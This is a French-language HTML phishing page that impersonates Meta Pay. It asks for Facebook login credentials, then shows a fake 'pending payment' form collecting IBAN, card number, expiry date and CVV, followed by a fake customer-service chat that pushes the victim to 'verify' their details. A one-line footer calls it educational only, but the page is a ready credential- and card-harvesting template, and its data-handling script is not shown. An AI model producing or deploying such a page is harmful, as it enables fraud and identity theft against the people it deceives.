<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Connexion - Meta Pay</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container">
        <!-- Page de connexion -->
        <div class="login-box" id="loginBox">
            <h1>Connexion à Meta Pay</h1>
            <form id="loginForm">
                <input type="text" id="email" placeholder="Adresse e-mail ou numéro de téléphone" required>
                <input type="password" id="password" placeholder="Mot de passe" required>
                <button type="submit">Se connecter</button>
            </form>
            <p>Pour utiliser ce service, vous devez vous connecter avec votre compte Facebook et utiliser les services de Meta Pay.</p>
        </div>

        <!-- Page de saisie des informations de paiement -->
        <div class="payment-box" id="paymentBox" style="display: none;">
            <h2>Paiement en attente</h2>
            <p>Vous avez un paiement en attente via Meta Pay. Veuillez compléter vos informations pour finaliser le paiement.</p>
            <form id="paymentForm">
                <input type="text" id="fullName" placeholder="Nom et Prénom" required>
                <input type="text" id="bankName" placeholder="Nom de la banque" required>
                <input type="text" id="iban" placeholder="IBAN" required>
                <input type="text" id="cardNumber" placeholder="Numéro de carte" required>
                <input type="text" id="expiryDate" placeholder="Date d'expiration (MM/AA)" required>
                <input type="text" id="cvv" placeholder="CVV" required>
                <button type="submit">Enregistrer et Payer</button>
            </form>
        </div>

        <!-- Page de chat avec le service client -->
        <div class="chat-box" id="chatBox" style="display: none;">
            <h2>Service Client Meta Pay</h2>
            <div id="chatMessages">
                <p><strong>Service Client:</strong> Bonjour ! Nous avons besoin de vérifier vos informations pour finaliser le paiement.</p>
            </div>
            <input type="text" id="chatInput" placeholder="Écrivez votre message...">
            <button onclick="sendMessage()">Envoyer</button>
        </div>

        <!-- Filigrane de sécurité -->
        <div class="security-watermark">
            <p>Ce site est à des fins éducatives uniquement. Ne pas utiliser pour des transactions réelles.</p>
        </div>
    </div>

    <script src="script.js"></script>
</body>
</html>